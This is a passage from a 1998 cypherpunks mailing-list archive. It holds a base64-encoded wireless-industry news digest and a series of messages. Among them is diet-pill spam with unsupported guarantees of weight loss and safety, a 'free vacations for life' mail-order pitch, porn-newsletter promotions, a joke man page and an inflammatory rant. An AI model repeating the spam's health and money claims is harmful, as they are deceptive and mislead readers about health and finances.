PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+VGhlIENhcm1lbCBDbGF5IFNjaG9vbCBC
b2FyZCBpbiBJbmRpYW5hcG9saXMKaXMgcmV2aWV3aW5nIENlbGx1bGFyIE9u
ZSBDb21tdW5pY2F0aW9ucycgcmVxdWVzdCB0byBlcmVjdCB0d28gbmluZS1z
dG9yeQpjb21tdW5pY2F0aW9uIHRvd2VycyBjb25jZWFsZWQgYXMgZmxhZ3Bv
bGVzLCBvbmUgYXQgU21va3kgUm93IEVsZW1lbnRhcnkKU2Nob29sIGFuZCBh
bm90aGVyIGF0IHRoZSBzY2hvb2wgY29ycG9yYXRpb24ncyBzb2NjZXIgY29t
cGxleC4gUmVzaWRlbnRzCmFyZSBleHBlY3RlZCB0byBvcHBvc2UgdGhlIGNv
bnN0cnVjdGlvbi4gKDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
cmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFtZWluZGV4LmNmbT9hcnRp
Y2xlaWQ9MzM0OCI+V09XLUNPTTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+RXJpY3Nzb24gQW5ub3Vu
Y2VzIE5ldwpNb2JpbGUgUGhvbmUgRm9yZWNhc3QgZm9yIDE5OTgtMjAwMDwv
Rk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5F
cmljc3NvbiBleHBlY3RzIHRoYXQgdGhlIGdsb2JhbCBtb2JpbGUKcGhvbmUg
bWFya2V0IHdpbGwgZXhjZWVkIDE0MCBtaWxsaW9uIHVuaXRzIGJ5IHRoZSBl
bmQgb2YgdGhpcyB5ZWFyLCBncm93aW5nCnRvIDIwMCBtaWxsaW9uIGR1cmlu
ZyAxOTk5LCBhbmQgMjY1IG1pbGxpb24gdW5pdHMgYnkgdGhlIHllYXIgMjAw
MC4gVGhlCmZvcmVjYXN0IGlzIGhpZ2hlciB0aGFuIEVyaWNzc29uIHByZXNl
bnRlZCBlYXJsaWVyIHRoaXMgeWVhci4gKDxBIEhSRUY9Imh0dHA6Ly9iaXou
eWFob28uY29tL2J3Lzk4MDgyNy9lcmljc3Nvbl8xLmh0bWwiPllBSE9PPC9B
Pik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0rMT5CaWcgTWV0ZW9yIFN0b3JtIElzIEhlYWRlZApPdXIgV2F5LCBJ
bXBlcmlsaW5nIFNhdGVsbGl0ZXM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+VGhlIExlb25pZCBtZXRlb3JvaWQgc3Rv
cm0sIHNjaGVkdWxlZAp0byBoaXQgaW4gODEgZGF5cywgaXMgZXhwZWN0ZWQg
dG8gYmUgdGhlIHdvcnN0IG1ldGVvciBzdG9ybSBpbiAzMiB5ZWFycy4KQWx0
aG91Z2ggdGhlcmUgaXMgbm8gcmlzayB0byBodW1hbiBsaWZlLS0tdGhlIG1l
dGVvcm9pZHMgd2lsbCBidXJuIHVwIGluCnRoZSBFYXJ0aCdzIGF0bW9zcGhl
cmUtLXRoZSBzdG9ybSBjb3VsZCBkYW1hZ2UgdGhlIGVzdGltYXRlZCA1MDAg
c2F0ZWxsaXRlcwpvcmJpdGluZyB0aGUgcGxhbmV0LiBUaGUgc3Rvcm0gd2ls
bCBzZW5kIGEgMTM2LDAwMC1taWxlIHRyYWlsIG9mIHNhbmQgYW5kCmRlYnJp
cywgbW9zdCBvZiB3aGljaCB3aWxsIGJlIHNtYWxsZXIgdGhhbiB3aWR0aCBv
ZiBhIGh1bWFuIGhhaXIgYnV0IHdpbGwKYmUgbW92aW5nIGF0IHRocmVlIHRp
bWVzIHRoZSBzcGVlZCBvZiB0aGUgYXZlcmFnZSBtZXRlb3JvaWQuIFRoZSBz
YW5kYmxhc3RpbmcKY291bGQgY3JlYXRlIGFuIGVsZWN0cmljIGNoYXJnZSB0
aGF0IGNvdWxkIHBvc3NpYmx5IGltcGFpciB0aGUgc2F0ZWxsaXRlcycKZWxl
Y3Ryb25pY3MuICg8QSBIUkVGPSJodHRwOi8vaW50ZXJhY3RpdmUud3NqLmNv
bS9hcnRpY2xlcy9TQjkwNDE5NDIzNDU0OTk4NDAwMC5odG0iPldBTEwKU1Qu
IEpPVVJOQUw8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj48Rk9OVCBTSVpFPSsxPkNvbHVtbmlzdCBDYWxscyBSb2FtZXIKQWRt
aW5pc3RyYXRpb24gRmVlIE9uZSZuYnNwOzwvRk9OVD48L0ZPTlQ+PC9CPgo8
QlI+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPm9mICJUZWNobm9sb2d5J3MgSGlkZGVuCkNvc3RzIjwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5BICQzLjUwIHJv
YW1pbmcgZmVlIGlzIGNoYXJnZWQgb24gYSBtb250aGx5CmJhc2lzIGFueXRp
bWUgYSBwaG9uZSBpcyB1c2VkIG91dHNpZGUgdGhlIGhvbWUgc2VydmljZSBh
cmVhLCB0aGUgY29sdW1uaXN0CndyaXRlcy4mbmJzcDsgT3RoZXIgY2VsbC1w
aG9uZSBjb21wYW5pZXMgY2FuIGNoYXJnZSBhIHNpbWlsYXIgZmVlIGV2ZXJ5
CmRheSB5b3UgdXNlIHlvdXIgcGhvbmUgaW4gdGhlaXIgYXJlYS4gSXQgZ2V0
cyBwYXNzZWQgb24gdGhyb3VnaCB5b3VyIGNvbXBhbnkuCkFuZCwgbGlrZSBv
dGhlciByb2FtaW5nIGZlZXMsIGl0IGdldHMgYXNzZXNzZWQgb24gaW5jb21p
bmcsIGFzIHdlbGwgYXMKb3V0Z29pbmcsIGNhbGxzLiAoPEEgSFJFRj0iaHR0
cDovL3d3dy51c2F0b2RheS5jb20vbGlmZS9jeWJlci90ZWNoL2N0ZDM1Ny5o
dG0iPlVTQQpUT0RBWTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+RXJpY3Nzb24gRXllcyBDZWxsIFBo
b25lCk1hcmtldCBmb3IgVGVlbmFnZXJzPC9GT05UPjwvRk9OVD48L0I+PC9U
RD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkVyaWNzc29uIHNhaWQgaXQgaXMg
cG9zc2libGUgaXQgd2lsbCBsYXVuY2gKY2VsbCBwaG9uZXMgYWltZWQgYXQg
cGFyZW50cyB3YW50aW5nIHRvIGtlZXAgaW4gY29udGFjdCB3aXRoIHRoZWly
IGNoaWxkcmVuLgpJZiBzdWNoIGEgcHJvZHVjdCB3ZXJlIGxhdW5jaGVkLCBF
cmljc3NvbiBzYWlkLCAiaXQgd291bGQgYmUgbWFya2V0ZWQgcmVzcG9uc2li
bHkKdG8gYWR1bHRzIG9ubHksIGFuZCBbRXJpY3Nzb25dIHdvdWxkIGNlcnRh
aW5seSBwb3NpdGlvbiBpdCBhcyBhIGNvbW11bmljYXRpb24KdG9vbCAtLSBu
b3QgYSB0b3kuIiAoPEEgSFJFRj0iaHR0cDovL3d3dy50ZWNod2ViLmNvbS93
aXJlL3N0b3J5L1RXQjE5OTgwODI3UzAwMDQiPlRFQ0hXRUI8L0E+KTwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsx
PkRhbGxhcy1Gb3J0IFdvcnRoIE1vYmlsZQpQaG9uZSBNYXJrZXQgT25lIG9m
IFByaWNpZXN0LCZuYnNwOzwvRk9OVD48L0ZPTlQ+PC9CPgo8QlI+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlJlcG9y
dCBTYXlzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPkJvc3RvbiB3YXMgdGhlIG1vc3QgZXhwZW5zaXZlIG1hcmtldCBv
ZgoxNSBtZXRybyBhcmVhcyBzdXJ2ZXllZCwgZm9sbG93ZWQgYnkgRGFsbGFz
LUZvcnQgV29ydGgsIGFjY29yZGluZyB0byBDb25zdW1lcgpSZXBvcnRzLiBU
aGUgZmluZGluZ3Mgd2VyZSB0YWtlbiBmcm9tIHByaWNlcyBhcyBvZiBKdW5l
IGZvciBzdWJzY3JpYmVycwp3aG8gdXNlIHRoZWlyIHBob25lcyBhbiBhdmVy
YWdlIG9mIDgwIG1pbnV0ZXMgYSBtb250aC4gKDxBIEhSRUY9Imh0dHA6Ly93
d3cud293LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFt
ZWluZGV4LmNmbT9hcnRpY2xlaWQ9MzM1MyI+V09XLUNPTTwvQT4pPC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+
Qm9iIFNoYW5lciBOYW1lZCBQcmVzaWRlbnQKYW5kIENoaWVmIEV4ZWN1dGl2
ZSBPZmZpY2VyJm5ic3A7PC9GT05UPjwvRk9OVD48L0I+CjxCUj48Qj48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+b2YgUGFj
aWZpYyBCZWxsIE1vYmlsZQpTZXJ2aWNlczwvRk9OVD48L0ZPTlQ+PC9CPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5QcmlvciB0byBqb2luaW5nIFBC
TVMsIFNoYW5lciB3YXMgcHJlc2lkZW50Cm9mIFNCQyBJbnRlcm5hdGlvbmFs
IEluYy4sIEV1cm9wZSBhbmQgTWlkZGxlIEVhc3QuIEhlIGJlZ2FuIHdvcmtp
bmcgZm9yClNvdXRod2VzdGVybiBCZWxsIFRlbGVwaG9uZSBpbiAxOTcwLiBJ
biAxOTg4LCBoZSB3YXMgbmFtZWQgcHJlc2lkZW50IGFuZApnZW5lcmFsIG1h
bmFnZXIgb2YgQ2VsbHVsYXIgT25lIGluIENoaWNhZ28sIGFuZCBpbiAxOTkx
IGhlIHdhcyBuYW1lZCBleGVjdXRpdmUKdmljZSBwcmVzaWRlbnQgb2YgU291
dGh3ZXN0ZXJuIEJlbGwgV2lyZWxlc3MgaW4gRGFsbGFzLiAoPEEgSFJFRj0i
aHR0cDovL2Jpei55YWhvby5jb20vYncvOTgwODI4L3BhY2lmaWNfYmVfMS5o
dG1sIj5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPjxGT05UIFNJWkU9KzE+VW5pb24gU2F5cyBVIFMgV0VTVCBJcwpV
c2luZyBTdHJpa2VicmVha2VyczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj5DV0Egb2ZmaWNpYWxzIHNhaWQgdGhleSBo
YXZlIHRvbGQgdGhlClUuUy4gSW1taWdyYXRpb24gYW5kIE5hdHVyYWxpemF0
aW9uIFNlcnZpY2UgYW5kIExhYm9yIERlcGFydG1lbnQgdGhhdCBVClMgV0VT
VCBpcyByZWNydWl0aW5nIGlsbGVnYWwgd29ya2VycyBmcm9tIENhbmFkYS4g
VSBTIFdFU1QgYWNrbm93bGVkZ2VkCmluIGEgc3RhdGVtZW50IHRoYXQgaXQg
aXMgdXNpbmcgY29udHJhY3Qgd29ya2VycyBkdXJpbmcgdGhlIHN0cmlrZSwg
YnV0CnNhaWQgYWxsIGFycmFuZ2VtZW50cyAidG8gdGhlIGJlc3Qgb2Ygb3Vy
IGtub3dsZWRnZSIgYXJlIGxlZ2FsLiAoPEEgSFJFRj0iaHR0cDovL3d3dy51
c2F0b2RheS5jb20vbW9uZXkvbWRzMDI2Lmh0bSI+VVNBClRPREFZPC9BPikm
bmJzcDs8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5Gb3IgYWRkaXRpb25hbCBuZXdz
IGFib3V0CnRoZSB3aXJlbGVzcyBpbmR1c3RyeS0taW5jbHVkaW5nIHBlcmlv
ZGljIG5ld3MgdXBkYXRlcyB0aHJvdWdob3V0IHRoZSBkYXktLXZpc2l0CjxB
IEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPmh0dHA6Ly93d3cud293
LWNvbS5jb20uPC9BPjwvRk9OVD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8
L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5DVElB
IERhaWx5IE5ld3MgZnJvbSBXT1ctQ09NCmlzIHRyYW5zbWl0dGVkIHdlZWtk
YXlzLCBleGNlcHQgZm9yIGhvbGlkYXlzLiBWaXNpdCB1cyBvbiB0aGUgV29y
bGQgV2lkZQpXZWIgYXQgPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNv
bS9wcm9mZXNzaW9uYWwiPmh0dHA6Ly93d3cud293LWNvbS5jb20vcHJvZmVz
c2lvbmFsPC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZuYnNwOwoKPFA+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPklmIHlv
dSBhcmUgbm90IGludGVyZXN0ZWQKaW4gcmVjZWl2aW5nIHRoZSBDVElBIERh
aWx5IE5ld3MgZnJvbSBXT1ctQ09NLCBwbGVhc2Ugc2VuZCBhIG1lc3NhZ2Ug
dG8KPEEgSFJFRj0ibWFpbHRvOnVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0y
LnVuaXR5bWFpbC5jb20iPnVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVu
aXR5bWFpbC5jb208L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5ic3A7Cgo8
UD48Qj4qKio8Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJ
WkU9LTE+IFRoZSB0ZXJtICJ1bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51
bml0eW1haWwuY29tIgptdXN0IGJlIGxpc3RlZCBpbiB0aGUgVE8gc2VjdGlv
biBvZiB0aGUgZW1haWwuPC9GT05UPjwvRk9OVD4gKioqPC9CPiZuYnNwOwoK
PFA+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0x
PlBsZWFzZSBOb3RlOiBTb21lIG9mIHRoZQpsaW5rcyBpbiB0b2RheSdzIG5l
d3MgYXJlIHRpbWUgc2Vuc2l0aXZlLiZuYnNwOyBUaG9zZSBsaW5rcyBtYXkg
bm90IGJlCmF2YWlsYWJsZSBhcyBuZXdzIGNoYW5nZXMgdGhyb3VnaG91dCB0
aGUgZGF5LiZuYnNwOyBBbHNvLCBzb21lIG5ld3Mgc291cmNlcwptYXkgYmUg
c3Vic2NyaXB0aW9uLWJhc2VkIG9yIHJlcXVpcmUgcmVnaXN0cmF0aW9uLjwv
Rk9OVD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+
CjwvVFI+CjwvVEFCTEU+PC9DRU5URVI+Cgo8Q0VOVEVSPiZuYnNwOzwvQ0VO
VEVSPgoKPC9CT0RZPgo8L0hUTUw+Cg==
--Boundary..3995.1071713796.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thin_Is_In......@Prodigy.net
Date: Fri, 28 Aug 1998 13:09:17 -0700 (PDT)
To: DoNotHitReply@DoNotHitReply.Com
Subject: ^*^* I lost 23 Pounds In 4 Weeks, So Could You!!! *^*^
Message-ID: <35E69D79.6F1A2C48@pat-med.k12.ny.us>
MIME-Version: 1.0
Content-Type: text/plain


EAT! EAT! EAT!
And Still Lose Weight!  No Joke!
Need To Lose Weight Quick?  Don't Have Time To Exercise?
HERE'S YOUR ANSWER!
And You Can Eat As Much As You Want!

Introducing Slender Now(tm)
GUARANTEED WEIGHT LOSS FOR LIFE!

How Confident Are We?...
In 30 Days If You're Not Completely Satisfied With 
This System, Send The "Empty" Bottles Back For FULL Refund!

This System Is So Effective, Test Subjects Typically
Lose 10 - 15 Pounds of FAT in the FIRST MONTH!
More Importantly, The Rebound Effect So Common 
With Other Forms Of Weight Loss Has Been Eliminated.


* A NO-FAIL Slender Now(tm) BURN, BIND, BLOCK and BUILD System 
BURN - StimuLean(tm) - A Unique Herbal Thermogenic Formula that allows
stored fats to be turned into energy (see below).
BIND - SlenderLean(tm) - A unique state-of-the-art fiber-based product that binds
 up to 40 grams (360 fat calories) of dietary fat from the foods you've just eaten, 
therefore throwing these excess fat calories out of your body as waste rather than 
storing them as fat (see below).
BLOCK - Phase'oLean(tm) - It's back!  Dr. Marshall's Exclusive STARCH 
BLOCKER(tm) FORMULA has been approved for re-release for the first 
time in 15 years! Each tablet has the capacity to block the digestion and 
absorption 	of more than 100 grams or more than 400 calories of 
starch (see below).
BUILD - Aminolyze(tm) - This product contains the specific amino acids 
necessary for your body to make new collagen.  It helps maintain lean 
body mass and build muscle tissue; very important while losing weight.  
You burn fat, rather than muscle, which helps to maintain a healthy lean 
body mass ratio 

* Eat as much as you want! 
* Your energy level will skyrocket!
* 100% safe and all natural!
* Get results in two weeks!
* 30 Day Money back guarantee - no questions asked! 


* EAT AS MUCH AS YOU WANT!  That's right, you can continue to 
eat your favorite high calorie foods and still lose weight!  That was 
mpossible until now!  With the revolutionary Slender Now(tm) System, 
you can enjoy your favorite foods like steak, pork, eggs and dairy 
products and still achieve your goal.
* 100% SAFE AND ALL NATURAL!  The Slender Now(tm) System 
contains no preservatives, sugar, starch, salt, wheat, yeast, milk, soy 
derivatives, artificial flavoring or coloring agents.  
* GET RESULTS IN TWO WEEKS!	90% of our clients are experiencing 
incredible results and immediate energy within the first two weeks!
* MONEY BACK GUARANTEE!  You have 30 days to try the products. 
If you are less than completely satisfied, send the "empty" bottles back 
for a full 100% refund.

You Have 30 DAYS To Try The Products At Wholesale Prices

Here is what just two people had to say (and there are many more):
Sharon H., female, age 44, Real-Estate agent, Atlanta, GA.  "I've lost 23 
pounds in four weeks and 2 dress sizes and my husband has lost 15.  
We were skeptical because we thought it was another one of those fad 
diets.  However, after researching and experiencing the products,  this 
is going to revolutinalize weight loss.  People have been asking me 
what I'm doing and when I tell them they don't believe it, so I just tell 
them to try it.  Why not? It comes with a 100% money back guarantee!"

Stanley K., male, age 41, Pittsburgh, PA.  "These products are amazing!  
Not only have I lost 15 pounds in first month, my energy level is high 
and consistent throughout the day. The system is easy; I've never 
been able to lose weight like this!  I'm actually eating more!  This has 
just blown me away.  And the most incredible thing is that I've haven't 
dieted a bit with the exception of avoiding excess starches."
For FREE, No Obligation Information About The Slender Now(tm) System, 

Call Toll FREE:  

1-888-668-0615

Due to the overwhelming response, you may get a busy signal.  If you do call
1-888-841-6242





















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@lo14.wroc.pl>
Date: Fri, 28 Aug 1998 10:35:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Man Sex
Message-ID: <fef31425ad48aef8355c3a1a160e7a1c@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


Interstate 95 wrote:
> SEX(1)              EUNUCH Programmer's Manual             SEX(1)
> 
> NAME
>        sex -- have sex
> 
> SYNOPSIS
>        sex [options] ...  [username] ...
> 
> DESCRIPTION
>        sex allows the invoker to have sex with the user(s) speci-
>        fied in the command line.  If no users are specified, they
>        are  taken  from the LOVERS environment variable.  Options
>        to make things more interesting are as follows:
> 
>        -a     external stimulus (aphrodisiac) option
> 
etc,

Lets see ...

# sex -monica
processing ...
-m masochism ...
-o oral ...
-n necrophilia ...
-i coitus interruptus ...
-c chocolate sauce option
-a external stimulus (aphrodisiac) option

Close, but no cigar.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wm. Michael Denney" <gomez0@pacbell.net>
Date: Fri, 28 Aug 1998 19:28:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: retry re. Cafe Gulag
Message-ID: <35E766F2.1D6158E7@pacbell.net>
MIME-Version: 1.0
Content-Type: text/plain


This is a retry because I have only vague recollections
of last night.
  G

--------------

This msg is intended to reach Jim Choate
with a request that he contact Larry Joe Dowling
at 512-892-3393

signed by "Toto"
------------------------
passed along by gomez
due to phone call from SOG





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: allstar@allstarvacations.com
Date: Sat, 29 Aug 1998 08:55:58 -0700 (PDT)
To: Travelers@fun.com
Subject: AD: FREE VACATCATIONS FOR LIFE
Message-ID: <1236528dfr>
MIME-Version: 1.0
Content-Type: text/plain


                                   "FREE VACATIONS FOR LIFE !"
 AND WHOLESALE VACATION RATES FOR THE REST OF YOUR LIFE !
LEARN THE INSIDE INFO THAT ALL THE VACATION WHOLESALERS KNOW,
AND DON'T WANT TO TELL YOU.

It's easy , I'll  show you how to get free and wholesale hotel rooms, resort condos, 
meals, discount air fares, attraction tickets, cruises and much more.

I've spent the last 20 years teaching people like you how to travel free and at 
wholesale prices and below!  Now it's your turn!!!

It's all in my complete vacation system!  Join the 100's of thousands of people
I've already taught.  That have all taken advantage of my system.  

You can too! Start traveling immediately!!

Send $4.95 check or money order for your free and discount
lifetime vacation system to:

 All Star Discount Vacation Travel
  & Entertainment Club Inc.
  7641 Villa Maria
 N.Syracuse, New York 13212-1121
 Att: Tony Regal
                                                           
100% Money Back Guarantee, included with your vacation system..





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sat, 29 Aug 1998 02:53:51 -0700 (PDT)
To: (STUFFED SATURDAY AUGUST 29 1998)
Subject: Getting the most porn for your $$$/City throws doosr open to $2 nudists
Message-ID: <19980829071000.6489.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Yet another great buncg of photos today. Plus today's biggy
is so good you'll probably save it to disk, use it as wallpaper
or print it out!

+ SUPER SEXY STORY
+ MORE ADVICE ON BEDDING WOMEN FROM JOHNNY SHACK
+ ANOTHER EXCELLENT 'TRUE SEX SECRET', AS SENT
  IN BY A READER
+ SURPRISE SEXY THUMBNAILS
+ LOADS AND LOADS MORE!

       ---->   http://stuffed.net/98/8/29/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/8/29/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sat, 29 Aug 1998 18:11:18 -0700 (PDT)
To: ted lewis <kalliste@aci.net>
Subject: La lucha
Message-ID: <35E8A596.3ABA@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


http://zolatimes.com/
http://www.friction-free-economy.com/         
http://www.mgovg.com/ethics/index.html  

Dear Mr. P,

Yes, we would be interested in a review of "The Friction-Free
Economy".

I should warn you that we are somewhat skeptical of Bill Gate's
terms like "fiction-free", or those views that say the whole
world operates like a computer company.

I am responding at the email address in your letter.  Reply
at my regular email address below.

Thanks,

Zola
(ezola@lfcity.com)

Date: Fri, 28 Aug 1998 11:36:17 -0700
From: The Electronic Zola <ezola@lfcity.com>  Save Address  Block Sender
To: hey guys, I ONLY SEND THEM! For a good reason.

Once Morales and I get settlement we will read e-mail!  AND LIKELY
START A WEB SITE!

Subject: Re: still interested?

>Yes, we are still interested.  You sent us a review before, and
>I sent you some suggestions for making it a little more reader
>accessible, and never heard back from you.
>
>Cheers,
>
>Zola

Zola

I AM NO LONGER real interested.

I will write you an article

  Black and white test of cryptographic algorithms

bill
505 292 7037

I didn't receive

>I sent you some suggestions for making it a little more reader
>accessible, and never heard back from you.
>

We ALL, of course, live in the REAL WORLD.

Have a good weekend EVERYONE.

Allahu akbar, too.  

Let's make the GREAT SATAN PAY!

http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  
http://jya.com/whpfiles.htm  
http://www.qainfo.se/~lb/crypto_ag.htm

And ALL hope for SETTLEMENT!

bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RyanFord@aol.com
Date: Sat, 29 Aug 1998 17:20:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: tell me
Message-ID: <9785fc31.35e89a8e@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


 hola and good tidings 
  send some info on spooks please 
  i will be grateful




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sun, 30 Aug 1998 02:15:15 -0700 (PDT)
To: (STUFFED SUNDAY AUGUST 30 1998)
Subject: HUBBY 'PAYS' WIFE FOR FOOD WITH SEX/TWO DOZEN SUPER HI-RES PHOTOS
Message-ID: <19980830071000.13358.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


That's right, we are increasing the numbers of free pics and today
there are over TWO DOZEN great photos to see in Stuffed. And most
in hi-res jpeg quality!

+ PAGE 2 'SPREAD' - YOU *HAVE* TO SEE THIS!
+ FROLICKING WITH FRUIT - YIKES, VEGGIES WILL NEVER BE THE SAME
+ LEANING TOWER OF PENIS - A STORY FROM A DIFFERENT MOLD
+ PHALLIC PRIEST - THE CHURCH OF SEX
+ THUMBNAIL HEAVEN - THAT'S WHERE YOU'LL BE!
+ SEXY STORY: 'AT THE MOVIES' - HOT AND VERY SEXY
+ WOMEN ARE EASY: 19 - PENULTIMATE PART, READ IT!
+ SIBERIAN SLUTS - JUST WHAT IS GOING ON HERE?
+ BEST OF EUREKA!: THE HOTTEST WEB SITES FROM EUREKA!
